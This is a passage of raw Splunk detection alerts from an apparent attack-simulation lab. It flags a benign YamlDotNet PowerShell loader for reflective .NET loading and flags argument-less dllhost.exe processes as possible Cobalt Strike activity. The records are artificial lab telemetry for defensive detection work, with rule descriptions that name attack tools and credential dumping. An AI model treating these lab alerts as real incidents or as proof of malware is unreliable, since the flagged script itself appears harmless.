or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664686800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664686800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2868", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664686800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664686800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xb34", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664690132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T04:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T04:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664690131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T04:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T04:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664690131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T04:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T04:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664690131, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T04:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T04:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664683200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664683200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2140", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664683200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664683200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x85c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664686532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664686532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], 